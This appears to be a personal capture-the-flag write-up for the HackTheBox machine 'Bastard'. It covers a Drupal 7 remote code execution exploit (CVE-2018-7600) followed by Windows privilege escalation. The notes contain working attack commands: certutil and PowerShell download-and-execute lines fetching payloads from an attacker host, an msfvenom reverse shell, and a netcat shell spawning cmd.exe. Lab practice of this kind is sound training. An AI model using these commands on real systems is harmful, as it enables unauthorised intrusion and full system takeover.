Search

Bastard (HackTheBox)

After scan we see Drupal 7

We search for it on metasploit and google.

We ignore google for now and try metasploit ones.

we give up

Mistake:

  • not trying all the metasploit ones (the ones with checks might give you a hint even if they don’t work)
  • If you find something on Google and choose to wait for after the metasploit ones, go back to the google one if others don’t work.
  • Check the -h on the scripts and how to use. You missed -c which lets you run a command (like whoami)
  • Just do enum using that weird shell

using the drupal remote code (in home/kali/CVE-2018-7600):

python2 drupa7-CVE-2018-7600.py -c 'whoami'  http://10.10.10.9/

python2 gets rid of some errors that python3 prints out but makes no difference.

We get systeminfo for suggester:

./windows-exploit-suggester.py --database 2024-04-08-mssb.xls --systeminfo /home/kali/Desktop/HackTheBox/Bastard/systeminfo.txt

vulnerable to chimichurri.

Open nc connection on 5555:

nc -nvlp 5555

We can send Chimichurri over and run it:

certutil -urlcache -f http://10.10.14.13:6999/Chimichurri.exe Chimichurri.exe
Chimichurri.exe 10.10.14.13 5555

We get system shell!

If it wasn’t vuln to chimichurri, we can make a x64 shell via msfvenom and send it over:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -f exe > shell.exe

open a server to send it over:

python3 -m http.server 80 #or 6999 or whatever
certutil -urlcache -f http://10.10.14.13/Shell.exe shell.exe

#if it's port 80 you don't need to specify port

netcat:

nc -nvlp 443

443 was the port we picked in the msfvenom command up there^

he put his in c:\temp

python2 drupa7-CVE-2018-7600.py -c 'c:\temp\shell.exe'  http://10.10.10.9/

and it pops shell for him but as user not admin

He uses Sherlock to get privesc

at the end of Sherlock, to make it open up and run (like we did before with PowerUp), add this at the very end:

Find-AllVulns

Send it over by hosting:

python3 -m http.server 80

Resource: https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters

command in shell to download and execute:

echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:80/Sherlock.ps1') | powershell -noprofile -

#From cmd download and execute

He used the ZIP version on github. He opened up the zip in folders and dragged the x64 executable into the transfer folder

Get both this exe and netcat:

certutil -urlcache -f http://10.10.14.19:6999/ms15-051x64.exe ms15.exe
certutil -urlcache -f http://10.10.14.19:6999/nc.exe nc.exe

Open a nc listener for shell:

nc -nvlp 6998

run ms15 with command (shell):

ms15.exe "nc.exe 10.10.14.19 6998 -e cmd.exe"